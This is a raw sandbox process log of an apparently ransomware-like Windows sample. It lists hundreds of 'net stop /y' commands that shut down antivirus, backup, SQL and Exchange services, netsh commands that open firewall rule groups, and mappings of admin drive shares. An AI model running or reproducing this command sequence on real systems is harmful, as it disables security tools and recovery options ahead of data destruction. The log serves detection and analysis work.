C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SavRoam /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop RTVscan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MySQL57 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop QBFCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop DefWatch /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop McShield /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop QBIDPService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop sacsvr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MySQL80 /y2⤵
-
C:\Windows\system32\net.exe"net.exe" stop McTaskManager /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SAVAdminService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop OracleClientCache80 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SAVService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SepMasterService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop swi_filter /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ShMonitor /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop swi_service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “SQL Backups /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop Smcinst /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer100 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop swi_update /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop NetMsmqActivator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SmcService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeIS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop swi_update_64 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SntpService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop TmCCSF /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SamSs /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop sophossps /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop tmlisten /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop IISAdmin /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer110 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop TrueKey /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeES /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop POP3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop svcGenericHost /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Agent” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop EraserSvc11710 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop msftesql$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SstpSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SMTPSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop WRSVC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMTA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop vapiendpoint /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeadtopology /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop audioendpointbuilder /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop AVP /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop UI0Detect /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeimap4 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop DCAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ARSM /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop W3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\Users2⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSRS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\A$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\B$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\C$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\D$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\E$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\F$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\G$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\N$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\H$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\O$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\I$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\P$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\J$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\Q$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\K$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\R$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\L$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\S$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\M$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\T$2⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\U$2⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
